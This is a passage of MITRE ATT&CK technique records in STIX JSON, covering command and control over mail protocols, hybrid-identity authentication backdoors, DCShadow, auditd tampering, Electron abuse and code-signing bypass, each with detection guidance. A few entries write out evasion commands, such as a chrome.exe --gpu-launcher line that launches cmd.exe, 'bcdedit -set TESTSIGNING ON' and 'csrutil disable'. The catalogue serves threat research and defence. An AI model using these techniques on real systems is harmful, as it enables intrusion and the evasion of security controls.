Desktop for Good and Evil. Retrieved August 16, 2021.", "url": "https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html"}, {"source_name": "TechNet Remote Desktop Services", "description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.", "url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx"}, {"source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing", "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.", "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins"}, {"source_name": "SSH Secure Shell", "description": "SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.", "url": "https://www.ssh.com/ssh"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T12:28:59.928Z", "name": "Mail Protocols", "description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: FireEye APT28) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", "created": "2020-03-15T16:21:45.131Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1071/003", "external_id": "T1071.003"}, {"source_name": "FireEye APT28", "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Hybrid Identity", "description": "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. \n\nMany organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud \n* Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory \n* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD \n\nAD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users\u2019 identity and privileges. \n\nBy modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.(Citation: Mandiant Azure AD Backdoors)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "SaaS", "Google Workspace", "Office 365", "IaaS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", "created": "2022-09-28T13:29:53.354Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1556/007", "external_id": "T1556.007"}, {"source_name": "Azure AD Connect for Read Teamers", "description": "Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers. Retrieved September 28, 2022.", "url": "https://blog.xpnsec.com/azuread-connect-for-redteam/"}, {"source_name": "AADInternals Azure AD On-Prem to Cloud", "description": "Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting access to cloud as an on-prem admin. Retrieved September 28, 2022.", "url": "https://o365blog.com/post/on-prem_admin/"}, {"source_name": "MagicWeb", "description": "Microsoft Threat Intelligence Center, Microsoft Detection and Response Team, Microsoft 365 Defender Research Team . (2022, August 24). MagicWeb: NOBELIUM\u2019s post-compromise trick to authenticate as anyone. Retrieved September 28, 2022.", "url": "https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/"}, {"source_name": "Azure AD Hybrid Identity", "description": "Microsoft. (2022, August 26). Choose the right authentication method for your Azure Active Directory hybrid identity solution. Retrieved September 28, 2022.", "url": "https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn"}, {"source_name": "Mandiant Azure AD Backdoors", "description": "Mike Burns. (2020, September 30). Detecting Microsoft 365 and Azure Active Directory Backdoors. Retrieved September 28, 2022.", "url": "https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Vulnerability Scanning", "description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\n\nThese scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", "created": "2020-10-02T16:55:16.047Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1595/002", "external_id": "T1595.002"}, {"source_name": "OWASP Vuln Scanning", "description": "OWASP. (n.d.). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020.", "url": "https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Cloud API", "description": "Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: Microsoft - Azure PowerShell), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006). \n\nCloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.\n\nWith proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Ozan Olali", "Nichols Jasper", "Jason Sevilla", "Marcus Weeks", "Caio Silva"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS", "Azure AD", "Office 365", "SaaS", "Google Workspace"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf", "created": "2022-03-17T13:28:24.989Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/009", "external_id": "T1059.009"}, {"source_name": "Microsoft - Azure PowerShell", "description": "Microsoft. (2014, December 12). Azure/azure-powershell. Retrieved March 24, 2023.", "url": "https://github.com/Azure/azure-powershell"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-10-18T22:45:19.607Z", "name": "Search Open Technical Databases", "description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)\n\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", "created": "2020-10-02T16:56:05.810Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1596", "external_id": "T1596"}, {"source_name": "Circl Passive DNS", "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", "url": "https://www.circl.lu/services/passive-dns/"}, {"source_name": "DNS Dumpster", "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", "url": "https://dnsdumpster.com/"}, {"source_name": "Medium SSL Cert", "description": "Jain, M. (2019, September 16). Export & Download \u2014 SSL Certificate from Server (Site URL). Retrieved October 20, 2020.", "url": "https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2"}, {"source_name": "WHOIS", "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.", "url": "https://www.whois.net/"}, {"source_name": "Shodan", "description": "Shodan. (n.d.). Shodan. Retrieved October 20, 2020.", "url": "https://shodan.io"}, {"source_name": "SSLShopper Lookup", "description": "SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.", "url": "https://www.sslshopper.com/ssl-checker.html"}, {"source_name": "DigitalShadows CDN", "description": "Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed \u2013 How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020.", "url": "https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-15T23:00:33.493Z", "name": "Electron Applications", "description": "Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1)\n\nDue to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\system32\\cmd.exe /c calc.exe`).(Citation: Electron 6-8)\n\nAdversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Debabrata Sharma"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows", "Linux"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", "created": "2024-03-07T19:32:35.383Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/015", "external_id": "T1218.015"}, {"source_name": "Electron 3", "description": "Alanna Titterington. (2023, September 14). Security of Electron-based desktop applications. Retrieved March 7, 2024.", "url": "https://www.kaspersky.com/blog/electron-framework-security-issues/49035/"}, {"source_name": "Electron Security", "description": "ElectronJS.org. (n.d.). Retrieved March 7, 2024.", "url": "https://www.electronjs.org/docs/latest/tutorial/using-native-node-modules"}, {"source_name": "Electron 6-8", "description": "Kosayev, U. (2023, June 15). One Electron to Rule Them All. Retrieved March 7, 2024.", "url": "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf"}, {"source_name": "Electron 1", "description": "TOM ABAI. (2023, August 10). There\u2019s a New Stealer Variant in Town, and It\u2019s Using Electron to Stay Fully Undetected. Retrieved March 7, 2024.", "url": "https://www.mend.io/blog/theres-a-new-stealer-variant-in-town-and-its-using-electron-to-stay-fully-undetected/"}, {"source_name": "Electron 2", "description": "Trend Micro. (2023, June 6). Abusing Electronbased applications in targeted attacks. Retrieved March 7, 2024.", "url": "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLP-CLEAR-Horejsi-Abusing-Electron-Based-Applications-in-Targeted-Attacks.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-03T03:44:46.935Z", "name": "Disable or Modify Linux Audit System", "description": "Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.\n\nOften referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)\n\nWith root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Tim (Wadhwa-)Brown"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", "created": "2023-05-24T19:03:03.855Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562/012", "external_id": "T1562.012"}, {"source_name": "IzyKnows auditd threat detection 2022", "description": "IzySec. (2022, January 26). Linux auditd for Threat Detection. Retrieved September 29, 2023.", "url": "https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505"}, {"source_name": "Red Hat System Auditing", "description": "Jahoda, M. et al.. (2017, March 14). Red Hat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"}, {"source_name": "ESET Ebury Feb 2014", "description": "M.L\u00e9veill\u00e9, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.", "url": "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/"}, {"source_name": "Trustwave Honeypot SkidMap 2023", "description": "Radoslaw Zdonczyk. (2023, July 30). Honeypot Recon: New Variant of SkidMap Targeting Redis. Retrieved September 29, 2023.", "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Rogue Domain Controller", "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Vincent Le Toux"], "x_mitre_detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)\n\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\n\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\n\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with \u201cGC/\u201d) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235\u20134B06\u201311D1-AB04\u201300C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Log analysis"], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1207", "external_id": "T1207"}, {"source_name": "DCShadow Blog", "description": "Delpy, B. & LE TOUX, V. (n.d.). DCShadow. Retrieved March 20, 2018.", "url": "https://www.dcshadow.com/"}, {"source_name": "Adsecurity Mimikatz Guide", "description": "Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.", "url": "https://adsecurity.org/?page_id=1821"}, {"source_name": "GitHub DCSYNCMonitor", "description": "Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March 30, 2018.", "url": "https://github.com/shellster/DCSYNCMonitor"}, {"source_name": "Microsoft DirSync", "description": "Microsoft. (n.d.). Polling for Changes Using the DirSync Control. Retrieved March 30, 2018.", "url": "https://msdn.microsoft.com/en-us/library/ms677626.aspx"}, {"source_name": "ADDSecurity DCShadow Feb 2018", "description": "Lucand,G. (2018, February 18). Detect DCShadow, impossible?. Retrieved March 30, 2018.", "url": "https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Code Signing Policy Modification", "description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Abel Morales, Exabeam"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as bcdedit.exe -set TESTSIGNING ON.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as HKCU\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing. Modifications to the code signing policy of a system are likely to be rare.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["User Mode Signature Validation", "Digital Certificate Validation", "Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", "created": "2021-04-23T01:04:57.161Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1553/006", "external_id": "T1553.006"}, {"source_name": "Apple Disable SIP", "description": "Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.", "url": "https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection"}, {"source_name": "F-Secure BlackEnergy 2014", "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. 